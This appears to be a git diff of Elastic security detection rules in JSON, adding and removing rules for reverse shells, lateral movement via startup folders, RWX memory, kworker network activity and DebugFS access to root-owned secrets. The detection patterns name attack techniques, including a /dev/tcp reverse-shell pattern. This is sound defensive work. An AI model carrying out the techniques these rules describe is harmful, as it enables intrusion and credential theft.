[documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Rootkit", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2339f03c-f53f-40fa-834b-40c5983fc41f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json b/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json deleted file mode 100644 index 7f9153e4c00..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2377946d-0f01-4957-8812-6878985f515d_1.json +++ /dev/null @@ -1,79 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Discovery of files created by a remote host on sensitive directories and folders. Remote file creation in these directories could indicate a malicious binary or script trying to compromise the system.", - "from": "now-10m", - "index": [ - "logs-endpoint.events.*" - ], - "interval": "5m", - "language": "eql", - "license": "Elastic License v2", - "name": "Remote File Creation on a Sensitive Directory", - "query": "file where (event.action == \"creation\" or event.action == \"modification\") and\nprocess.name:(\"System\", \"scp\", \"sshd\", \"smbd\", \"vsftpd\", \"sftp-server\") and not\nuser.name:(\"SYSTEM\", \"root\") and\n(file.path : (\"C*\\\\Users\\\\*\\\\AppData\\\\Roaming*\", \"C*\\\\Program*Files\\\\*\",\n \"C*\\\\Windows\\\\*\", \"C*\\\\Windows\\\\System\\\\*\",\n \"C*\\\\Windows\\\\System32\\\\*\", \"/etc/*\", \"/tmp*\",\n \"/var/tmp*\", \"/home/*/.*\", \"/home/.*\", \"/usr/bin/*\",\n \"/sbin/*\", \"/bin/*\", \"/usr/lib/*\", \"/usr/sbin/*\",\n \"/usr/share/*\", \"/usr/local/*\", \"/var/lib/dpkg/*\",\n \"/lib/systemd/*\"\n )\n)\n", - "references": [ - "https://www.elastic.co/es/blog/remote-desktop-protocol-connections-elastic-security" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "2377946d-0f01-4957-8812-6878985f515d", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "Use Case: Lateral Movement Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1210", - "name": "Exploitation of Remote Services", - "reference": "https://attack.mitre.org/techniques/T1210/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "2377946d-0f01-4957-8812-6878985f515d_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json b/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json new file mode 100644 index 00000000000..f6239999769 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/23bcd283-2bc0-4db2-81d4-273fc051e5c0_1.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a previously unknown unix binary with read, write and execute memory region permissions. The mprotect() system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. RWX permissions on memory is in many cases overly permissive, and should be analyzed thoroughly.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unknown Execution of Binary with RWX Memory Region", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "event.category:process and host.os.type:linux and auditd.data.syscall:mprotect and auditd.data.a2:7\n", + "references": [ + "https://man7.org/linux/man-pages/man2/mprotect.2.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "23bcd283-2bc0-4db2-81d4-273fc051e5c0", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S mprotect\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "23bcd283-2bc0-4db2-81d4-273fc051e5c0_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json new file mode 100644 index 00000000000..9793c8defba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_107.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Lateral Movement via Startup Folder", + "query": "file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", + "references": [ + "https://www.mdsec.co.uk/2017/06/rdpinception/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "25224a80-5a4a-4b8a-991e-6ab390465c4f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json new file mode 100644 index 00000000000..aee2fadbbe7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25224a80-5a4a-4b8a-991e-6ab390465c4f_108.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Lateral Movement via Startup Folder", + "query": "file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", + "references": [ + "https://www.mdsec.co.uk/2017/06/rdpinception/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "25224a80-5a4a-4b8a-991e-6ab390465c4f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json new file mode 100644 index 00000000000..fae6bef4841 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Background Process", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name in (\"setsid\", \"nohup\") and process.args : \"*/dev/tcp/*0>&1*\" and \nprocess.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "259be2d8-3b1a-4c2c-a0eb-0c8e77f35e39_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json new file mode 100644 index 00000000000..3bfa83ab8ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/25d917c4-aa3c-4111-974c-286c0312ff95_3.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for network connections from a kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.", + "from": "now-60m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Network Activity Detected via Kworker", + "new_terms_fields": [ + "host.id", + "process.name", + "destination.ip" + ], + "query": "host.os.type:linux and event.category:network and event.action:(connection_attempted or connection_accepted) and \nprocess.name:kworker* and not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.168.0.0/16 or\n 224.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "25d917c4-aa3c-4111-974c-286c0312ff95", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + }, + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "25d917c4-aa3c-4111-974c-286c0312ff95_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json new file mode 100644 index 00000000000..d627b0961b9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2605aa59-29ac-4662-afad-8d86257c7c91_5.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the \"disk\" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with \"disk\" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Suspicious DebugFS Root Device Access", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"debugfs\" and process.args : \"/dev/sd*\" and not process.args == \"-R\" and \nnot user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\"\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#disk-group" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "2605aa59-29ac-4662-afad-8d86257c7c91", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "2605aa59-29ac-4662-afad-8d86257c7c91_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json new file mode 100644 index 00000000000..c48aef71e9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_110.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Update Orchestrator Service Hijack", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes 